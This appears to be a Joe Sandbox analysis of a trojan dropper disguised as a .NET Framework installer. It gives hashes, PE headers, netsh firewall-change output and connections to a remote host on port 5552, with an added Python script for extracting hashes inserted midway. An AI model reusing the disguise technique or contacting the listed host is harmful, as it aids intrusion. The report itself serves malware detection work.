                                                                                                                                                                  SHA1:7E25BA36BCC7DEED89F3C9568016DDB3156C9C5A
                                                                                                                                                                  SHA-256:7A0D281FA802D615EA1207BD2E9EBB98F3B74F9833BBA3CB964BA7C7E0FB67FD
                                                                                                                                                                  SHA-512:E4FB7E4D39F094463FDCDC4895AB2EA500EB51A32B6909CEC80A526BBF34D5C0EB98F47EE256C0F0865BF3169374937F047BF5C4D6762779C8CA3332B4103BE3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................&......&.......R.....z.....O.....{......B...........O.....~.....J.....K.....L....Rich...........................PE..L......K.........."!................Y...............................................;.....@.....................................h....................:..X...............................................@............................................text............................... ..`.data...8...........................@....rsrc................f..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):295248
                                                                                                                                                                  Entropy (8bit):6.262127887617593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:/LTVUK59JN+C0iy4Ww8oBcPFIOrvHvr8QDZHAAKWiIHT6llN1QkvQZaiionv5y/y:HOoMFrz8ygAKWiiIyKf73w
                                                                                                                                                                  MD5:EB881E3DDDC84B20BD92ABCEC444455F
                                                                                                                                                                  SHA1:E2C32B1C86D4F70E39DE65E9EBC4F361B24FF4A1
                                                                                                                                                                  SHA-256:11565D97287C01D22AD2E46C78D8A822FA3E6524561D4C02DFC87E8D346C44E7
                                                                                                                                                                  SHA-512:5750CEC73B36A3F19BFB055F880F3B6498A7AE589017333F6272D26F1C72C6F475A3308826268A098372BBB096B43FBD1E06E93EECC0A81046668228BC179A75
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..bI...I..WI...I..cI..I..ZI...I...IG..I..WI...I..fI...I..RI...I..SI...I..TI...IRich...I................PE..L......K.........."!................................................................yq....@..........................................P...............j..P....`..0?..................................`z..@............................................text............................... ..`.data....Q.......4..................@....rsrc........P......................@..@.reloc...T...`...V..................@..B........................................................................................................................................................................................................................................................................................................................................................
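The dropped-file records above are a flat key:value listing, and the useful facts are buried in it: the files written by C:\ProgramData\dotNetFx40_Client_setup.exe include a manifest naming "Microsoft .NET Framework 4 Client Profile Setup" and three PE files with 0% detection, which is consistent with the dropper carrying genuine installer components as cover, and two pairs of icon files share a file type and size (1150 and 10134 bytes) yet have different hashes, so size-and-type matching is not a substitute for per-file hashes. The script below is an added example, not part of the Joe Sandbox report or any tool it uses; it parses records in the page's own layout into dicts, exports the PE hashes for hunting, flags size collisions, and compares a file's SHA-256 against a report value. SAMPLE is constructed from three of the records above (Preview lines omitted, hashes copied as printed).

```python
"""Turn Joe Sandbox 'dropped file' records (as laid out on this page)
into structured data an analyst can act on.

Added example; the record format is inferred from the listing above.
SAMPLE is a constructed excerpt of three records from that listing.
"""
import hashlib
import re
from collections import defaultdict

SAMPLE = """\
Process:C:\\ProgramData\\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:dropped
Size (bytes):1150
Entropy (8bit):5.038533294442847
Encrypted:false
MD5:661CBD315E9B23BA1CA19EDAB978F478
SHA-256:8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
Malicious:false
Process:C:\\ProgramData\\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:dropped
Size (bytes):1150
Entropy (8bit):5.854644771288791
Encrypted:false
MD5:EE2C05CC9D14C29F586D40EB90C610A9
SHA-256:3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
Malicious:false
Process:C:\\ProgramData\\dotNetFx40_Client_setup.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):78152
Entropy (8bit):6.011592088917562
Encrypted:false
MD5:006F8A615020A4A17F5E63801485DF46
SHA-256:D273460AA4D42F0B5764383E2AB852AB9AF6FECB3ED866F1783869F2F155D8BE
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
"""


def parse_dropped(text):
    """Split the listing into one dict per dropped file.

    A record starts at every 'Process:' line. 'Antivirus:' is a bare
    header; the per-engine results follow it as '•' bullet lines and
    are collected under the 'av' key. Values are split on the FIRST
    colon only, so 'Process:C:\\...' keeps its drive letter.
    """
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            # engine result belonging to the current record
            records[-1]["av"].append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Process":
            records.append({"av": []})
        if not records:
            raise ValueError("listing does not start with a Process: line")
        if key == "Size (bytes)":
            records[-1][key] = int(value)
        elif key != "Antivirus":
            records[-1][key] = value
    return records


def pe_iocs(records):
    """(SHA-256, size) for every PE drop: the values worth hunting on,
    regardless of the benign-looking installer file names."""
    return [(r["SHA-256"], r["Size (bytes)"]) for r in records
            if r.get("File Type", "").startswith("PE32")]


def size_collisions(records):
    """Sizes shared by more than one drop, with the distinct hashes that
    share them; shows why size/type alone cannot identify a drop."""
    by_size = defaultdict(list)
    for r in records:
        by_size[r["Size (bytes)"]].append(r["SHA-256"])
    return {size: hashes for size, hashes in by_size.items() if len(hashes) > 1}


def max_detection(record):
    """Highest 'Detection: N%' among the record's engines; 0 if none listed."""
    hits = [int(n) for entry in record["av"]
            for n in re.findall(r"Detection:\s*(\d+)%", entry)]
    return max(hits, default=0)


def sha256_matches(data, expected_hex):
    """Compare bytes recovered from a host against a report hash,
    ignoring the case difference between hashlib and the report."""
    return hashlib.sha256(data).hexdigest().lower() == expected_hex.strip().lower()


if __name__ == "__main__":
    recs = parse_dropped(SAMPLE)
    for sha, size in pe_iocs(recs):
        print(f"PE drop  {sha}  {size} bytes")
    for size, hashes in size_collisions(recs).items():
        print(f"{size} bytes shared by {len(hashes)} different files")
```

The two 1150-byte icons collide on size and file type but not on hash, which is the result the script is meant to surface; on a real host, feed the bytes of the recovered file to sha256_matches with the report's SHA-256 rather than trusting the file name, since the names here are chosen to look like a .NET Framework installer.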
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):30120
                                                                                                                                                                  Entropy (8bit):4.990211039591874
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:hlzLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMC:1wchT+cxcDm
                                                                                                                                                                  MD5:2FADD9E618EFF8175F2A6E8B95C0CACC
                                                                                                                                                                  SHA1:9AB1710A217D15B192188B19467932D947B0A4F8
                                                                                                                                                                  SHA-256:222211E8F512EDF97D78BC93E1F271C922D5E91FA899E092B4A096776A704093
                                                                                                                                                                  SHA-512:A3A934A8572FF9208D38CF381649BD83DE227C44B735489FD2A9DC5A636EAD9BB62459C9460EE53F61F0587A494877CD3A3C2611997BE563F3137F8236FFC4CA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema".. xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui".. xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui".. targetNamespace="http://schemas.microsoft.com/SetupUI/2008/01/imui".. elementFormDefault="qualified"..attributeFormDefault="unqualified"..>.... <xs:annotation>.. <xs:documentation>.. Copyright (c) Microsoft Corporation. All rights reserved... Schema for describing DevDiv "Setup UI Info".. </xs:documentation>.. </xs:annotation>.... <xs:element name="SetupUI">.. <xs:annotation>.. <xs:documentation>specifies UI dll, and lists of MSIs MSPs and EXEs</xs:documentation>.. </xs:annotation>.. <xs:complexType>.. <xs:sequence>.. <xs:choice>.. <xs:element ref="UI" minOccurs="1" maxOccurs="1"></xs:element>.. <xs:element ref="Strings" minOccurs="1" maxOccurs="1"></xs:element>..
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):96088
                                                                                                                                                                  Entropy (8bit):6.292361456158864
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:L+59IKI1N74oszIepIJqwlAno0dwRXPuY6zcVcE7OgkT9vs6M4raUZrH9rHUA:L+59hI1NktIemJllRXGYRKEaVM4raUZh
                                                                                                                                                                  MD5:8DFBB95989AF28058C7431704CE7CD66
                                                                                                                                                                  SHA1:78A5927D6B65D177F537FC671ED6BE4A77F20353
                                                                                                                                                                  SHA-256:589B4F04ED38A35D29C4A16FCCB489C3FBA6505F5DA399C1A2AF0CA966486059
                                                                                                                                                                  SHA-512:51FFB1B20006BB1C2F396C84EF19D7D47AD421D0A3196919B4ABC26405326BF15DDB989EDF815CBEDEEA8DEDC0454C0CC22A3987492E9BC1646A42A31151E1AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ux`.1...1...1...8a..0...^o......^o..!...^o..@...8a..:...1...T...Vo..0...Vo..;...Vo..0...Vo..0...Vo..0...Vo..0...Rich1...........................PE..L......K.........."......0...L.......^.......@....@..................................u....@...... ..................`>.......5..x....p...............`..X............................................K..@...............|............................text............0.................. ..`.data........@.......4..............@....rsrc........p.......D..............@..@.reloc..f............H..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 200 x 200 x 8, image size 40002, resolution 3779 x 3779 px/m, cbSize 41080, bits offset 1078
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41080
                                                                                                                                                                  Entropy (8bit):6.9955557349183595
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:G1o2kgxmJGEsU3pP28+Qq1ms68/tUqHUlHGwM7bwv3ETbFrS:kkpoapTbimsqHGI
                                                                                                                                                                  MD5:0966FCD5A4AB0DDF71F46C01EFF3CDD5
                                                                                                                                                                  SHA1:8F4554F079EDAD23BCD1096E6501A61CF1F8EC34
                                                                                                                                                                  SHA-256:31C13ECFC0EB27F34036FB65CC0E735CD444EEC75376EEA2642F926AC162DCB3
                                                                                                                                                                  SHA-512:A9E70A2FB5A9899ACF086474D71D0E180E2234C40E68BCADB9BF4FE145774680CB55584B39FE53CC75DE445C6BF5741FC9B15B18385CBBE20FC595FE0FF86FCE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:BMx.......6...(...................B.......................{7...>...h?..D...N...K..........xE..._#..q..T...X...Q...[..._...c...j....>.!....f...v...r...."..v....0....... ..........4..I.........[...}..............j.............................................................................................................i......................@>1.......................................................o...u...u...z...z...~............................................................................................................................................................................{...~.................................................................................................................yw`......................................................................................................................................................//'...........................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14084
                                                                                                                                                                  Entropy (8bit):3.701412990655975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:VqZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+F:VqB
                                                                                                                                                                  MD5:8A28B474F4849BEE7354BA4C74087CEA
                                                                                                                                                                  SHA1:C17514DFC33DD14F57FF8660EB7B75AF9B2B37B0
                                                                                                                                                                  SHA-256:2A7A44FB25476886617A1EC294A20A37552FD0824907F5284FADE3E496ED609B
                                                                                                                                                                  SHA-512:A7927700D8050623BC5C761B215A97534C2C260FCAB68469B7A61C85E2DFF22ED9CF57E7CB5A6C8886422ABE7AC89B5C71E569741DB74DAA2DCB4152F14C2369
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". ..... . . . . . . . . .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.S.t.r.i.n.g.s.>..... . . . .<.!.-.-. .R.e.f.l.e.c.t.i.v.e. .p.r.o.p.e.r.t.y. .p.a.g.e. .-.-.>..... . . . .<.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>.#.(.l.o.c...i.d.s._.i.s._.r.e.a.l.l.y._.c.a.n.c.e.l.).<./.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>......... . . . .<.!.-.-. .S.y.s.t.e.m. .R.e.q.u.i.r.e.m.e.n.t.s. .p.a.g.e. .-.-.>..... . . . .<.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.P.A.C.E.>.#.(.l.o.c...s.y.s.r.e.q.p.a.g.e._.r.e.q.u.i.r.e.d._.a.n.d._.a.v.a.i.l.a.b.l.e._.d.i.s.k._.s.p.a.c.e.).<./.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39042
                                                                                                                                                                  Entropy (8bit):3.1132391675648923
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:24URyd5vssgP7ZgZ/vSguJQvFQXvDINJh6F8hZkV1GO0N0phUl9eu+dODOOODOtK:24URyd5vsTPuZXQYQLIN/6F8hZkV1GOv
                                                                                                                                                                  MD5:D7A2E90DD9DF6F93FD4B7354F8EC2B0D
                                                                                                                                                                  SHA1:A792C41B62796513E312F19DEE91447B9280B23B
                                                                                                                                                                  SHA-256:1D1590EB48E66646ED7917A76302862AC87E6651C841A808CF3FE797B9E697F6
                                                                                                                                                                  SHA-512:A3431DA5517428B69D4481A98AB6CDA6849F3B1B33DD44CC2EDFD76DDBF51BD2B45B3C4ED21293F7FEE2789281B8CF5120EF83F11F99DE6FC18C0E3FE5D1D9D5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 49 x 49 x 8, image size 2550, resolution 2834 x 2834 px/m, cbSize 3628, bits offset 1078
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3628
                                                                                                                                                                  Entropy (8bit):4.8382652865388724
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:f0sO8Kdwc6o5NF5ghwwpnMOccFpscGqfkemvIQpQK/xHiggTfGRgVC0q:cMa1krnrJmdQ+EgyfG3
                                                                                                                                                                  MD5:514BFCD8DA66722A9639EB41ED3988B7
                                                                                                                                                                  SHA1:CF11618E3A3C790CD5239EE749A5AE513B4205CD
                                                                                                                                                                  SHA-256:6B8201ED10CE18FFADE072B77C6D1FCACCF1D29ACB47D86F553D9BEEBD991290
                                                                                                                                                                  SHA-512:89F01C3361BA874015325007EA24E83AE6E73700996D0912695A4E7CB3F8A611494BA9D63F004DCD4F358821E756BE114BCF0137ED9B130776A6E26A95382C7B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:BM,.......6...(...1...1................................iI.|4..{3...8...:...qI..oH..hH......8...9...<...A...>..}<...@...F...C..t:...A...D...qG..C...E..m:...L...K...H...G...L...N..yB...L..........N...S...Z...S..vC...J...U......V...S...R...Y...V...Y...Y...M...Z...h...x8..|<...i......]...\...Y...]...V...^...^...e...c...o...l...c...a..._..._...b...X...j...^...d...k...j...q...u...p...x+..p.....h...g...d...j...b...u...u...n...t...t...s...m...r...u...s...{"...4...i..r...m...m...w...u...q...t...}...K...N..U..l..........r.......x...{....!...#...)..@..N..V...............$...#...'...,..4..5..:..C..T..u......................... ...'...*..,.....<..B..V..\..e..p..............)..,..2..4..5..9..<..<..R..\..d...y........................................................ ..)..3..8..:..B..L..O..n......................................................4..^....................O...b...|.........................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):144416
                                                                                                                                                                  Entropy (8bit):6.7404750879679485
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:uochw/MFWrJjKOMxRSepuBaqn/NlnBh2Lx0JVzx1wWobn1ek8F7HncO5hK9YSHlN:zDFB47UhXBh2yJ5HcOSSSHZqG
                                                                                                                                                                  MD5:3F0363B40376047EFF6A9B97D633B750
                                                                                                                                                                  SHA1:4EAF6650ECA5CE931EE771181B04263C536A948B
                                                                                                                                                                  SHA-256:BD6395A58F55A8B1F4063E813CE7438F695B9B086BB965D8AC44E7A97D35A93C
                                                                                                                                                                  SHA-512:537BE86E2F171E0B2B9F462AC7F62C4342BEB5D00B68451228F28677D26A525014758672466AD15ED1FD073BE38142DAE478DF67718908EAE9E6266359E1F9E8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................................Rich...................PE..L....IE...........!.........$.....................l.........................@......R.....@.........................D.......$...d....................... (... ......P...8............................\..@.......t.......D............................text............................... ..`.data...............................@....rsrc...............................@..@.reloc....... ......................@..Ba.IE8....IEC....IEP....IEZ.....IEe....IEP...........msvcrt.dll.ADVAPI32.dll.ntdll.DLL.USER32.dll.KERNEL32.dll...............................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 164 x 628 x 8, image size 102994, resolution 3779 x 3779 px/m, cbSize 104072, bits offset 1078
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):104072
                                                                                                                                                                  Entropy (8bit):7.2628723112196
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:QKUpOeBmAj72KbvEvffvCv7cTIMUHuRzHA8X9H51T9ho4xw7CgB1:QKULmAfbvEv47cIHzE9vo4SuU1
                                                                                                                                                                  MD5:B0075CEE80173D764C0237E840BA5879
                                                                                                                                                                  SHA1:B4CF45CD5BB036F4F210DFCBA6AC16665A7C56A8
                                                                                                                                                                  SHA-256:AB18374B3AAB10E5979E080D0410579F9771DB888BA1B80A5D81BA8896E2D33A
                                                                                                                                                                  SHA-512:71A748C82CC8B0B42EF5A823BAC4819D290DA2EDDBB042646682BCCC7EB7AB320AFDCFDFE08B1D9EEBE149792B1259982E619F8E33845E33EEC808C546E5C829
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:BM........6...(.......t...........R...................};.......F.......T...c....H..b...t...m...z...d...a..._...f...f....&..x...j...w...o...k...r....+..........|...u...|...q...v...w...|...2..~...z.......x...........{.................................................................... ...#..:..P..e................................#..#..&..(..+..+..-........EDA................$..,../..4..2..6..;...........................$..'..,..0..:..?..E......................6..5..>...D...I...K...Q...j...................=...D...L...P...U...V...\...r.....................Y...\...`...d...b...f...j...l...{..................................`...g...o...u...|....................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\netsh.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 313
Entropy (8bit): 4.971939296804078
Encrypted: false
SSDEEP: 6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
MD5: 689E2126A85BF55121488295EE068FA1
SHA1: 09BAAA253A49D80C18326DFBCA106551EBF22DD6
SHA-256: D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
SHA-512: C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
Malicious: false
Preview: ..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.74314221794367
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.69%
• Win32 Executable (generic) a (10002005/4) 49.65%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• InstallShield setup (43055/19) 0.21%
• Windows Screen Saver (13104/52) 0.07%
File name: ESjy0irMIn.exe
File size: 1'078'272 bytes
MD5: 536018d01ee05bc37064c480178e2bf8
SHA1: 1d21d2d4f21fa7a19cad7e69c8c143bebc9ba7fd
SHA256: a9ea7800b0f50505268b058f14a23dbe4cf6c0f134681a68dce7429b9df8d88b
SHA512: 666ca68783a862ad3ce3e031854aa3344398ae52eda5dd5a97fed0baa964f3cdf8f26289b6adc1db9843f79c142ce36547417f8b13adf86d35f03394cfd1ec14
SSDEEP: 24576:vtW4x8xgmUdUcyezFSjahBaNOMGC3UgJuTYdIMlM9QVmcIOLfEdjJYVB1X1:s4x8x1UGexmbcMGC3U3MlLVmczEdjJYR
TLSH: B735DF1F11A0A033EFD236716998B2603F6DDD5AA7308D8F32C432FD4AF1AE26975255
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P._.................h............... ........@.. ....................................@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x5087de
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x5FC55092 [Mon Nov 30 20:05:38 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x108784         0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10a000         0x6ae         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x10c000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x1067e4      0x106800  False     0.8275660342261905  data       7.749537444364443    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x10a000         0x6ae         0x800     False     0.36279296875       data       3.703676379231205    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x10c000         0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x10a0a0  0x424  data                                                                                                   0.41226415094339625
RT_MANIFEST  0x10a4c4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5469387755102041
                                                                                                                                                                  DLLImport
                                                                                                                                                                  mscoree.dll_CorExeMain
                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Nov 3, 2023 18:54:00.017623901 CET555249761156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:00.520868063 CET497615552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:00.779654026 CET555249761156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:02.856251955 CET497625552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:03.121669054 CET555249762156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:03.630237103 CET497625552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:03.895549059 CET555249762156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:04.395831108 CET497625552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:04.661735058 CET555249762156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:05.161566973 CET497625552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:05.427448034 CET555249762156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:05.942775011 CET497625552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:06.207758904 CET555249762156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:08.229829073 CET497635552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:08.507890940 CET555249763156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:09.020942926 CET497635552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:09.286331892 CET555249763156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:54:09.802118063 CET497635552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:54:10.068300009 CET555249763156.196.162.149192.168.2.4
